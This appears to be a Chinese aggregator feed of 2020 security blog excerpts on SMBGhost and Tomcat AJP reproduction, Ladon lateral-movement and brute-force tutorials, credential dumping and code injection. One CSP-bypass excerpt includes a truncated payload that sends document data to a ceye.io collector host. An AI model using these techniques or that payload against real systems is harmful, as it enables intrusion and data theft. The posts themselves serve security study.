Windows SMBv3 CVE-2020-0796 漏洞分析和l漏洞复现 - 渗透测试中心 0x00  漏洞描述漏洞公告显示，SMB 3.1.1协议中处理压缩消息时，对其中数据没有经过安全检查，直接使用会引发内存破坏漏洞，可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权... 2020-06-05 16:59:00 | 阅读: 551 | 收藏 | www.cnblogs.com 漏洞 windows 缓冲区 数据

Ladon批量检测漏洞 SMBGhost CVE-2020-0796 - K8哥哥 漏洞介绍2020年3月10日，微软在其官方SRC发布了CVE-2020-0796的安全公告（ADV200005，MicrosoftGuidance for Disabling SMBv3... 2020-06-04 21:53:00 | 阅读: 904 | 收藏 | www.cnblogs.com 漏洞 smbghost windows 0796 1909

内网域安全入侵感知系统watchAD - 渗透测试中心 一、前言介绍    WatchAD收集所有域控上的事件日志和kerberos流量，通过特征匹配、Kerberos协议分析、历史行为、敏感操作和蜜罐账户等方式来检测各种已知与未知威胁，功能覆... 2020-06-01 10:56:00 | 阅读: 818 | 收藏 | www.cnblogs.com watchad winlogbeat 威胁 数据 流量

Ladon扫描器简明教程/用法例子 - K8哥哥 前言本文仅是Ladon简单使用例子，Cobalt Strike或PowerShell版用法一致。完整文档：http://k8gege.org/Ladon资产扫描、指纹识别、服务识别、存... 2020-05-31 23:49:00 | 阅读: 1478 | 收藏 | www.cnblogs.com 端口 爆破 k8gege 漏洞 whoami

〖教程〗Ladon IIS站点密码读取 - K8哥哥 首页新随笔订阅管理随笔 - 147  文章 - 0  评论 - 25... 2020-05-31 23:45:00 | 阅读: 583 | 收藏 | www.cnblogs.com enumiis k8gege k8 哥哥 随笔

〖教程〗Ladon连接WebShell一句话远程执行命令 - K8哥哥 前言在内网渗透中，横向移动用的最多的就是远程执行命令了，网上有很多相关工具，系统也自带相关命令。但不是体积大就是命令繁琐，如schtasks命令等，执行需先创建任务、执行任务、删除任务等，... 2020-05-31 23:41:00 | 阅读: 682 | 收藏 | www.cnblogs.com k8gege whoami 端口 k8gege520

〖教程〗Ladon远程命令执行Wmiexec/psexec/atexec/psexec/webshell - K8哥哥 前言在内网渗透中，横向移动用的最多的就是远程执行命令了，网上有很多相关工具，系统也自带相关命令。但不是体积大就是命令繁琐，如schtasks命令等，执行需先创建任务、执行任务、删除任务等，... 2020-05-30 16:50:00 | 阅读: 726 | 收藏 | www.cnblogs.com k8gege whoami 端口 k8gege520

〖教程〗Winrm远程命令/端口复用后门/Windows密码爆破 - K8哥哥 简介WinRM是WindowsRemoteManagementd（win远程管理）的简称。基于Web服务管理(WS-Management)标准，使用80端口或者443端口。这样一来，我们就... 2020-05-30 16:49:00 | 阅读: 922 | 收藏 | www.cnblogs.com 端口 winrmscan 5985 k8gege winrs

〖教程〗Ladon以指定用户权限运行程序或命令 - K8哥哥 前言Ladon内置Runas允许用户用其他权限运行指定的工具和程序。系统自带Runas命令需要交互式登陆，在webshell或不支持交互式的shell下使用麻烦。而Ladon的Runas则... 2020-05-30 16:46:00 | 阅读: 694 | 收藏 | www.cnblogs.com runas k8gege whoami k8gege520

〖教程〗Ladon迷你WEB服务器/一键内网HTTP服务器 - K8哥哥 前言你是否在为配置浏览器漏洞测试环境而烦恼，如配置Apache解析某种MIME测试某个漏洞又或者在为内网机器无WEB又无法通过其它协议传输文件到内网另一台不出网的主机烦恼还有些远程命令... 2020-05-30 16:44:00 | 阅读: 612 | 收藏 | www.cnblogs.com 漏洞 浏览器 远程 webser k8gege

Shodan使用指南 - zha0gongz1 Shodan是用于搜索连接到互联网的设备的工具。与搜索引擎可以帮助你找到网站不同，Shodan可以帮助你找到有关台式机，服务器，IoT设备等的信息。此信息包括元数据，例如在每个设备上运行的软件。S... 2020-5-24 13:27:0 | 阅读: 13 | 收藏 | 博客园 - zha0gongz1 - www.cnblogs.com facets 信息 python facet github

Linux内存凭据提取mimipenguin - 挖洞的土拨鼠 安装与测试mimipenguin安装方法bobac@UBP:~$ git clone https://github.com/huntergregal/mimipenguin.git... 2020-05-22 16:17:00 | 阅读: 145 | 收藏 | www.cnblogs.com passwords memrange crypt salt

Java openrasp学习记录-1 - tr1ple 2020-05-19 20:34:00 | 阅读: 140 | 收藏 | www.cnblogs.com

Java openrasp学习记录-1 - tr1ple 最近一直在做学校实验室安排的项目，太惨了，没多少时间学习新知识，不过rasp还是要挤挤时间学的，先从小例子的分析开始，了解rasp的基本设计思路，后面详细阅读openrasp的源码进行学习！欢迎在... 2020-5-19 19:34:0 | 阅读: 19 | 收藏 | www.cnblogs.com xbear visitors modulename

CreateRemoteThread盲注提权原理分析 - 挖洞的土拨鼠 绪论：迷茫前提下的背景知识首先我们来看下进程程注入的核心逻辑（不考虑寻找目标进程、不考虑注入内容的执行）/*注入恶意Payload：OpenProcess 可以打开目标进程Virt... 2020-05-19 16:45:00 | 阅读: 127 | 收藏 | www.cnblogs.com 注入 payload

Linux下利用动态链接劫持库函数并注入代码 - 挖洞的土拨鼠 关于环境变量$ LD_PRELOAD$LD_PRELOAD是一个环境变量，用于加载动态库，他的优先级是最高的/* 优先级顺序： (1)$LD_PRELOAD (2... 2020-05-18 16:28:00 | 阅读: 158 | 收藏 | www.cnblogs.com shlib library payload 库函数 injecting

[教程]Windows下使用Ladon批量爆破SSH弱口令 - K8哥哥 前言对于Linux操作系统来说，一般通过VNC、Teamviewer和SSH等工具来进行远程管理，SSH是 Secure Shell的缩写，由IETF的网络小组（Network Worki... 2020-05-13 22:47:00 | 阅读: 1095 | 收藏 | www.cnblogs.com 爆破 ssh 端口 sshscan userpass

CVE-2020-1938 ：Apache Tomcat AJP 漏洞复现和分析 - 渗透测试中心 一、漏洞描述Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器.默认情况下,Apache Tomcat会开启AJP连接器,方便与其他Web服... 2020-05-11 18:18:00 | 阅读: 779 | 收藏 | www.cnblogs.com ajp unpack 漏洞 ajpresponse 10487

渗透测试中如何去套路到你想要的密码 - don0t 密码/口令密码和口令是通往权限和控制效果的重要途径，通过获取目标的重要系统口令或口令设置规律，能够有效的实现横向移动和重要的权限提升，因此密码/口令在渗透测试过程中被作为重点关注对象，比如在我们获... 2020-5-3 16:30:0 | 阅读: 3 | 收藏 | 博客园 - don0t - www.cnblogs.com 渗透 加密 劫持 数据 脚本

iframe绕过csp - Afant1 看csp规则，默认是在当前域内，允许执行内联js。如果这是一道ctf的话，就很简单了，window.location.href='http://aa.xxxx.ceye.io?'+docu... 2020-05-03 15:08:00 | 阅读: 116 | 收藏 | www.cnblogs.com php dcl n0 拦截